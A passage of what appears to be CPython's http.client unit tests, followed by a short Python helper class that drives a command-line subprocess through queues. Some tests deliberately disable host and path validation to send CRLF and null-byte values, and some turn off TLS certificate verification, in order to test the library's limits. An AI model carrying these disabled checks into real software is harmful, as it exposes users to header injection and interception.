self.assertRaises((client.LineTooLong, client.BadStatusLine), resp.begin)
def test_overflowing_header_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'X-Foo: bar' + 'r' * 65536 + '\r\n\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises(client.LineTooLong, resp.begin)
def test_overflowing_header_limit_after_100(self):
body = (
'HTTP/1.1 100 OK\r\n'
'r\n' * 32768
)
resp = client.HTTPResponse(FakeSocket(body))
with self.assertRaises(client.HTTPException) as cm:
resp.begin()
# Assert on the message as well, because other errors that we do not
# want here are also subclasses of HTTPException.
self.assertIn('got more than ', str(cm.exception))
self.assertIn('headers', str(cm.exception))
def test_overflowing_chunked_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
+ '0' * 65536 + 'a\r\n'
'hello world\r\n'
'0\r\n'
'\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
resp.begin()
self.assertRaises(client.LineTooLong, resp.read)
def test_early_eof(self):
# Test an HTTPResponse with no \r\n termination.
body = "HTTP/1.1 200 Ok"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_error_leak(self):
# Test that the socket is not leaked if getresponse() fails
conn = client.HTTPConnection('example.com')
response = None
class Response(client.HTTPResponse):
def __init__(self, *pos, **kw):
nonlocal response
response = self # Avoid garbage collector closing the socket
client.HTTPResponse.__init__(self, *pos, **kw)
conn.response_class = Response
conn.sock = FakeSocket('Invalid status line')
conn.request('GET', '/')
self.assertRaises(client.BadStatusLine, conn.getresponse)
self.assertTrue(response.closed)
self.assertTrue(conn.sock.file_closed)
def test_chunked_extension(self):
extra = '3;foo=bar\r\n' + 'abc\r\n'
expected = chunked_expected + b'abc'
sock = FakeSocket(chunked_start + extra + last_chunk_extended + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_missing_end(self):
"""some servers may serve up a short chunked encoding stream"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk) #no terminating crlf
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_trailers(self):
"""See that trailers are read and ignored"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# we should have reached the end of the file
self.assertEqual(sock.file.read(), b"") #we read to the end
resp.close()
def test_chunked_sync(self):
"""Check that we don't read past the end of the chunked-encoding stream"""
expected = chunked_expected
extradata = "extradata"
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata.encode("ascii")) #we read to the end
resp.close()
def test_content_length_sync(self):
"""Check that we don't read past the end of the Content-Length stream"""
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readlines_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readlines(2000), [expected])
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(2000), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readline_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readline(10), expected)
self.assertEqual(resp.readline(10), b"")
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 30\r\n\r\n' + expected*3 + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(20), expected*2)
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_response_fileno(self):
# Make sure fd returned by fileno is valid.
threading = support.import_module("threading")
serv = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
self.addCleanup(serv.close)
serv.bind((HOST, 0))
serv.listen()
result = None
def run_server():
[conn, address] = serv.accept()
with conn, conn.makefile("rb") as reader:
# Read the request header until a blank line
while True:
line = reader.readline()
if not line.rstrip(b"\r\n"):
break
conn.sendall(b"HTTP/1.1 200 Connection established\r\n\r\n")
nonlocal result
result = reader.read()
thread = threading.Thread(target=run_server)
thread.start()
self.addCleanup(thread.join, float(1))
conn = client.HTTPConnection(*serv.getsockname())
conn.request("CONNECT", "dummy:1234")
response = conn.getresponse()
try:
self.assertEqual(response.status, client.OK)
s = socket.socket(fileno=response.fileno())
try:
s.sendall(b"proxied data\n")
finally:
s.detach()
finally:
response.close()
conn.close()
thread.join()
self.assertEqual(result, b"proxied data\n")
def test_putrequest_override_domain_validation(self):
"""
It should be possible to override the default validation
behavior in putrequest (bpo-38216).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_path(self, url):
pass
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/\x00')
def test_putrequest_override_host_validation(self):
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_host(self, url):
pass
conn = UnsafeHTTPConnection('example.com\r\n')
conn.sock = FakeSocket('')
# set skip_host so a ValueError is not raised upon adding the
# invalid URL as the value of the "Host:" header
conn.putrequest('GET', '/', skip_host=1)
def test_putrequest_override_encoding(self):
"""
It should be possible to override the default encoding
to transmit bytes in another encoding even if invalid
(bpo-36274).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _encode_request(self, str_url):
return str_url.encode('utf-8')
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/☃')
class ExtendedReadTest(TestCase):
"""
Test peek(), read1(), readline()
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'\r\n'
'hello world!\n'
'and now \n'
'for something completely different\n'
'foo'
)
lines_expected = lines[lines.find('hello'):].encode("ascii")
lines_chunked = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
def setUp(self):
sock = FakeSocket(self.lines)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
resp.fp = io.BufferedReader(resp.fp)
self.resp = resp
def test_peek(self):
resp = self.resp
# patch up the buffered peek so that it returns not too much stuff
oldpeek = resp.fp.peek
def mypeek(n=-1):
p = oldpeek(n)
if n >= 0:
return p[:n]
return p[:10]
resp.fp.peek = mypeek
all = []
while True:
# try a short peek
p = resp.peek(3)
if p:
self.assertGreater(len(p), 0)
# then unbounded peek
p2 = resp.peek()
self.assertGreaterEqual(len(p2), len(p))
self.assertTrue(p2.startswith(p))
next = resp.read(len(p2))
self.assertEqual(next, p2)
else:
next = resp.read()
self.assertFalse(next)
all.append(next)
if not next:
break
self.assertEqual(b"".join(all), self.lines_expected)
def test_readline(self):
resp = self.resp
self._verify_readline(self.resp.readline, self.lines_expected)
def _verify_readline(self, readline, expected):
all = []
while True:
# short readlines
line = readline(5)
if line and line != b"foo":
if len(line) < 5:
self.assertTrue(line.endswith(b"\n"))
all.append(line)
if not line:
break
self.assertEqual(b"".join(all), expected)
def test_read1(self):
resp = self.resp
def r():
res = resp.read1(4)
self.assertLessEqual(len(res), 4)
return res
readliner = Readliner(r)
self._verify_readline(readliner.readline, self.lines_expected)
def test_read1_unbounded(self):
resp = self.resp
all = []
while True:
data = resp.read1()
if not data:
break
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_bounded(self):
resp = self.resp
all = []
while True:
data = resp.read1(10)
if not data:
break
self.assertLessEqual(len(data), 10)
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_0(self):
self.assertEqual(self.resp.read1(0), b"")
def test_peek_0(self):
p = self.resp.peek(0)
self.assertLessEqual(0, len(p))
class ExtendedReadTestChunked(ExtendedReadTest):
"""
Test peek(), read1(), readline() in chunked mode
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
class Readliner:
"""
a simple readline class that uses an arbitrary read function and buffering
"""
def __init__(self, readfunc):
self.readfunc = readfunc
self.remainder = b""
def readline(self, limit):
data = []
datalen = 0
read = self.remainder
try:
while True:
idx = read.find(b'\n')
if idx != -1:
break
if datalen + len(read) >= limit:
idx = limit - datalen - 1
# read more data
data.append(read)
read = self.readfunc()
if not read:
idx = 0 #eof condition
break
idx += 1
data.append(read[:idx])
self.remainder = read[idx:]
return b"".join(data)
except:
self.remainder = b"".join(data)
raise
class OfflineTest(TestCase):
def test_all(self):
# Documented objects defined in the module should be in __all__
expected = {"responses"} # Allowlist documented dict() object
# HTTPMessage, parse_headers(), and the HTTP status code constants are
# intentionally omitted for simplicity
blacklist = {"HTTPMessage", "parse_headers"}
for name in dir(client):
if name.startswith("_") or name in blacklist:
continue
module_object = getattr(client, name)
if getattr(module_object, "__module__", None) == "http.client":
expected.add(name)
self.assertCountEqual(client.__all__, expected)
def test_responses(self):
self.assertEqual(client.responses[client.NOT_FOUND], "Not Found")
def test_client_constants(self):
# Make sure we don't break backward compatibility with 3.4
expected = [
'CONTINUE',
'SWITCHING_PROTOCOLS',
'PROCESSING',
'OK',
'CREATED',
'ACCEPTED',
'NON_AUTHORITATIVE_INFORMATION',
'NO_CONTENT',
'RESET_CONTENT',
'PARTIAL_CONTENT',
'MULTI_STATUS',
'IM_USED',
'MULTIPLE_CHOICES',
'MOVED_PERMANENTLY',
'FOUND',
'SEE_OTHER',
'NOT_MODIFIED',
'USE_PROXY',
'TEMPORARY_REDIRECT',
'BAD_REQUEST',
'UNAUTHORIZED',
'PAYMENT_REQUIRED',
'FORBIDDEN',
'NOT_FOUND',
'METHOD_NOT_ALLOWED',
'NOT_ACCEPTABLE',
'PROXY_AUTHENTICATION_REQUIRED',
'REQUEST_TIMEOUT',
'CONFLICT',
'GONE',
'LENGTH_REQUIRED',
'PRECONDITION_FAILED',
'REQUEST_ENTITY_TOO_LARGE',
'REQUEST_URI_TOO_LONG',
'UNSUPPORTED_MEDIA_TYPE',
'REQUESTED_RANGE_NOT_SATISFIABLE',
'EXPECTATION_FAILED',
'UNPROCESSABLE_ENTITY',
'LOCKED',
'FAILED_DEPENDENCY',
'UPGRADE_REQUIRED',
'PRECONDITION_REQUIRED',
'TOO_MANY_REQUESTS',
'REQUEST_HEADER_FIELDS_TOO_LARGE',
'INTERNAL_SERVER_ERROR',
'NOT_IMPLEMENTED',
'BAD_GATEWAY',
'SERVICE_UNAVAILABLE',
'GATEWAY_TIMEOUT',
'HTTP_VERSION_NOT_SUPPORTED',
'INSUFFICIENT_STORAGE',
'NOT_EXTENDED',
'NETWORK_AUTHENTICATION_REQUIRED',
]
for const in expected:
with self.subTest(constant=const):
self.assertTrue(hasattr(client, const))
class SourceAddressTest(TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.source_port = support.find_unused_port()
self.serv.listen()
self.conn = None
def tearDown(self):
if self.conn:
self.conn.close()
self.conn = None
self.serv.close()
self.serv = None
def testHTTPConnectionSourceAddress(self):
self.conn = client.HTTPConnection(HOST, self.port,
source_address=('', self.source_port))
self.conn.connect()
self.assertEqual(self.conn.sock.getsockname()[1], self.source_port)
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not defined')
def testHTTPSConnectionSourceAddress(self):
self.conn = client.HTTPSConnection(HOST, self.port,
source_address=('', self.source_port))
# We don't test anything here other than the constructor not barfing as
# this code doesn't deal with setting up an active running SSL server
# for an ssl_wrapped connect() to actually return from.
class TimeoutTest(TestCase):
PORT = None
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TimeoutTest.PORT = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
def testTimeoutAttribute(self):
# This will prove that the timeout gets through HTTPConnection
# and into the socket.
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
# no timeout -- do not use global socket default
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT,
timeout=None)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), None)
httpConn.close()
# a value
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT, timeout=30)
httpConn.connect()
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
class PersistenceTest(TestCase):
def test_reuse_reconnect(self):
# Should reuse or reconnect depending on header from server
tests = (
('1.0', '', False),
('1.0', 'Connection: keep-alive\r\n', True),
('1.1', '', True),
('1.1', 'Connection: close\r\n', False),
('1.0', 'Connection: keep-ALIVE\r\n', True),
('1.1', 'Connection: cloSE\r\n', False),
)
for version, header, reuse in tests:
with self.subTest(version=version, header=header):
msg = (
'HTTP/{} 200 OK\r\n'
'{}'
'Content-Length: 12\r\n'
'\r\n'
'Dummy body\r\n'
).format(version, header)
conn = FakeSocketHTTPConnection(msg)
self.assertIsNone(conn.sock)
conn.request('GET', '/open-connection')
with conn.getresponse() as response:
self.assertEqual(conn.sock is None, not reuse)
response.read()
self.assertEqual(conn.sock is None, not reuse)
self.assertEqual(conn.connections, 1)
conn.request('GET', '/subsequent-request')
self.assertEqual(conn.connections, 1 if reuse else 2)
def test_disconnected(self):
def make_reset_reader(text):
"""Return BufferedReader that raises ECONNRESET at EOF"""
stream = io.BytesIO(text)
def readinto(buffer):
size = io.BytesIO.readinto(stream, buffer)
if size == 0:
raise ConnectionResetError()
return size
stream.readinto = readinto
return io.BufferedReader(stream)
tests = (
(io.BytesIO, client.RemoteDisconnected),
(make_reset_reader, ConnectionResetError),
)
for stream_factory, exception in tests:
with self.subTest(exception=exception):
conn = FakeSocketHTTPConnection(b'', stream_factory)
conn.request('GET', '/eof-response')
self.assertRaises(exception, conn.getresponse)
self.assertIsNone(conn.sock)
# HTTPConnection.connect() should be automatically invoked
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
def test_100_close(self):
conn = FakeSocketHTTPConnection(
b'HTTP/1.1 100 Continue\r\n'
b'\r\n'
# Missing final response
)
conn.request('GET', '/', headers={'Expect': '100-continue'})
self.assertRaises(client.RemoteDisconnected, conn.getresponse)
self.assertIsNone(conn.sock)
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
class HTTPSTest(TestCase):
def setUp(self):
if not hasattr(client, 'HTTPSConnection'):
self.skipTest('ssl support required')
def make_server(self, certfile):
# from test.ssl_servers import make_https_server
return make_https_server(self, certfile=certfile)
def test_attributes(self):
# simple test to check it's storing the timeout
h = client.HTTPSConnection(HOST, TimeoutTest.PORT, timeout=30)
self.assertEqual(h.timeout, 30)
def test_networked(self):
# Default settings: requires a valid cert from a trusted CA
# import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
h = client.HTTPSConnection('self-signed.pythontest.net', 443)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_networked_noverification(self):
# Switch off cert verification
# import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl._create_unverified_context()
h = client.HTTPSConnection('self-signed.pythontest.net', 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
h.close()
self.assertIn('nginx', resp.getheader('server'))
resp.close()
@support.system_must_validate_cert
def test_networked_trusted_by_default_cert(self):
# Default settings: requires a valid cert from a trusted CA
support.requires('network')
with support.transient_internet('www.python.org'):
h = client.HTTPSConnection('www.python.org', 443)
h.request('GET', '/')
resp = h.getresponse()
content_type = resp.getheader('content-type')
resp.close()
h.close()
self.assertIn('text/html', content_type)
def test_networked_good_cert(self):
# We feed the server's cert as a validating cert
# import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERT_selfsigned_pythontestdotnet)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
h.request('GET', '/')
resp = h.getresponse()
server_string = resp.getheader('server')
resp.close()
h.close()
self.assertIn('nginx', server_string)
def test_networked_bad_cert(self):
# We feed a "CA" cert that is unrelated to the server's cert
# import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_unknown_cert(self):
# The custom cert isn't known to the default trust bundle
# import ssl
server = self.make_server(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_good_hostname(self):
# The (valid) cert validates the HTTP hostname
# import ssl
server = self.make_server(CERT_localhost)
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port, context=context)
self.addCleanup(h.close)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.addCleanup(resp.close)
self.assertEqual(resp.status, 404)
def test_local_bad_hostname(self):
# The (valid) cert doesn't validate the HTTP hostname
# import ssl
server = self.make_server(CERT_fakehostname)
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(CERT_fakehostname)
h = client.HTTPSConnection('localhost', server.port, context=context)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# Same with explicit check_hostname=True
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# With check_hostname=False, the mismatching is ignored
context.check_hostname = False
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=False)
h.request('GET', '/nonexistent')
resp = h.getresponse()
resp.close()
h.close()
self.assertEqual(resp.status, 404)
# The context's check_hostname setting is used if one isn't passed to
# HTTPSConnection.
context.check_hostname = False
h = client.HTTPSConnection('localhost', server.port, context=context)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.assertEqual(resp.status, 404)
resp.close()
h.close()
# Passing check_hostname to HTTPSConnection should override the
# context's setting.
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not available')
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPSConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:443", "www.python.org", 443),
("www.python.org:", "www.python.org", 443),
("www.python.org", "www.python.org", 443),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 443),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b",
443)):
c = client.HTTPSConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
class RequestBodyTest(TestCase):
"""Test cases where a request includes a message body."""
def setUp(self):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket("")
def get_headers_and_fp(self):
f = io.BytesIO(self.sock.data)
f.readline() # read the request line
message = client.parse_headers(f)
return message, f
def test_list_body(self):
# Note that no Content-Length is automatically calculated for an
# iterable; the request falls back to sending it with chunked
# transfer encoding.
cases = (
([b'foo', b'bar'], b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
((b'foo', b'bar'), b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
)
for body, expected in cases:
with self.subTest(body):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket('')
self.conn.request('PUT', '/url', body)
msg, f = self.get_headers_and_fp()
self.assertNotIn('Content-Type', msg)
self.assertNotIn('Content-Length', msg)
self.assertEqual(msg.get('Transfer-Encoding'), 'chunked')
self.assertEqual(expected, f.read())
def test_manual_content_length(self):
# Set an incorrect content-length so that we can verify that
# it will not be over-ridden by the library.
self.conn.request("PUT", "/url", "body",
{"Content-Length": "42"})
message, f = self.get_headers_and_fp()
self.assertEqual("42", message.get("content-length"))
self.assertEqual(4, len(f.read()))
def test_ascii_body(self):
self.conn.request("PUT", "/url", "body")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("4", message.get("content-length"))
self.assertEqual(b'body', f.read())
def test_latin1_body(self):
self.conn.request("PUT", "/url", "body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_bytes_body(self):
self.conn.request("PUT", "/url", b"body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_text_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "w") as f:
f.write("body")
with open(support.TESTFN) as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
# No content-length will be determined for files; the body
# will be sent using chunked transfer encoding instead.
self.assertIsNone(message.get("content-length"))
self.assertEqual("chunked", message.get("transfer-encoding"))
self.assertEqual(b'4\r\nbody\r\n0\r\n\r\n', f.read())
def test_binary_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "wb") as f:
f.write(b"body\xc1")
with open(support.TESTFN, "rb") as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("chunked", message.get("Transfer-Encoding"))
self.assertNotIn("Content-Length", message)
self.assertEqual(b'5\r\nbody\xc1\r\n0\r\n\r\n', f.read())
class HTTPResponseTest(TestCase):
def setUp(self):
body = "HTTP/1.1 200 Ok\r\nMy-Header: first-value\r\nMy-Header: \
second-value\r\n\r\nText"
sock = FakeSocket(body)
self.resp = client.HTTPResponse(sock)
self.resp.begin()
def test_getting_header(self):
header = self.resp.getheader('My-Header')
self.assertEqual(header, 'first-value, second-value')
header = self.resp.getheader('My-Header', 'some default')
self.assertEqual(header, 'first-value, second-value')
def test_getting_nonexistent_header_with_string_default(self):
header = self.resp.getheader('No-Such-Header', 'default-value')
self.assertEqual(header, 'default-value')
def test_getting_nonexistent_header_with_iterable_default(self):
header = self.resp.getheader('No-Such-Header', ['default', 'values'])
self.assertEqual(header, 'default, values')
header = self.resp.getheader('No-Such-Header', ('default', 'values'))
self.assertEqual(header, 'default, values')
def test_getting_nonexistent_header_without_default(self):
header = self.resp.getheader('No-Such-Header')
self.assertEqual(header, None)
def test_getting_header_defaultint(self):
header = self.resp.getheader('No-Such-Header',default=42)
self.assertEqual(header, 42)
class TunnelTests(TestCase):
def setUp(self):
response_text = (
'HTTP/1.0 200 OK\r\n\r\n' # Reply to CONNECT
'HTTP/1.1 200 OK\r\n' # Reply to HEAD
'Content-Length: 42\r\n\r\n'
)
self.host = 'proxy.com'
self.conn = client.HTTPConnection(self.host)
self.conn._create_connection = self._create_connection(response_text)
def tearDown(self):
self.conn.close()
def _create_connection(self, response_text):
def create_connection(address, timeout=None, source_address=None):
return FakeSocket(response_text, host=address[0], port=address[1])
return create_connection
def test_set_tunnel_host_port_headers(self):
tunnel_host = 'destination.com'
tunnel_port = 8888
tunnel_headers = {'User-Agent': 'Mozilla/5.0 (compatible, MSIE 11)'}
self.conn.set_tunnel(tunnel_host, port=tunnel_port,
headers=tunnel_headers)
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertEqual(self.conn._tunnel_host, tunnel_host)
self.assertEqual(self.conn._tunnel_port, tunnel_port)
self.assertEqual(self.conn._tunnel_headers, tunnel_headers)
def test_disallow_set_tunnel_after_connect(self):
# Once connected, we shouldn't be able to tunnel anymore
self.conn.connect()
self.assertRaises(RuntimeError, self.conn.set_tunnel,
'destination.com')
def test_connect_with_tunnel(self):
self.conn.set_tunnel('destination.com')
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
# issue22095
self.assertNotIn(b'Host: destination.com:None', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
# This test should be removed when CONNECT gets the HTTP/1.1 blessing
self.assertNotIn(b'Host: proxy.com', self.conn.sock.data)
def test_connect_put_request(self):
self.conn.set_tunnel('destination.com')
self.conn.request('PUT', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
def test_tunnel_debuglog(self):
expected_header = 'X-Dummy: 1'
response_text = 'HTTP/1.0 200 OK\r\n{}\r\n\r\n'.format(expected_header)
self.conn.set_debuglevel(1)
self.conn._create_connection = self._create_connection(response_text)
self.conn.set_tunnel('destination.com')
with support.captured_stdout() as output:
self.conn.request('PUT', '/', '')
lines = output.getvalue().splitlines()
self.assertIn('header: {}'.format(expected_header), lines)
if __name__ == '__main__':
unittest.main(verbosity=2)
|
cli_session.py
|
from __future__ import absolute_import
import sys
from threading import Thread
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty # python 3.x
ON_POSIX = 'posix' in sys.builtin_module_names
class CliSession:
def __init__(self, process):
self.process = process
self.stdout = Queue()
self.stderr = Queue()
self.thread_out = Thread(target=self.__enqueue_output, args=(process.stdout, self.stdout))
self.thread_err = Thread(target=self.__enqueue_output, args=(process.stderr, self.stderr))
for t in [self.thread_out, self.thread_err]:
t.daemon = True
t.start()
self.__outputs = []
self.__errors = []
def do(self, query):
# Reads whatever remains in stdout/stderr
self.__read_all()
self.process.stdin.write(query + ';\n')
return self
def last_output(self):
self.__read_output()
return self.__outputs[-1]
def last_error(self):
self.__read_errors()
return self.__errors[-1]
def outputs(self):
self.__read_output()
return self.__outputs
def errors(self):
self.__read_errors()
return self.__errors
def has_errors(self):
self.__read_errors()
for err in self.__errors:
if 'WARNING' not in err and err != '':
return True
return False
def close(self):
self.process.stdin.write('quit;\n')
self.process.wait()
def __read_all(self):
self.__read_output()
self.__read_errors()
def __read_output(self):
r = self.__read(self.stdout)
if r:
self.__outputs.append(r)
def __read_errors(self):
r = self.__read(self.stderr)
if r:
self.__errors.append(r)
def __read(self, queue):
output = None
while True:
try:
line = queue.get(timeout=.2)
except Empty:
return output
else:
output = line if output is None else output + line
def __enqueue_output(self, out, queue):
for line in iter(out.readline, ''):
queue.put(line)
out.close()
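# --- Usage sketch (not part of the original module) ---
# A minimal, hedged example of driving CliSession via subprocess.Popen. The
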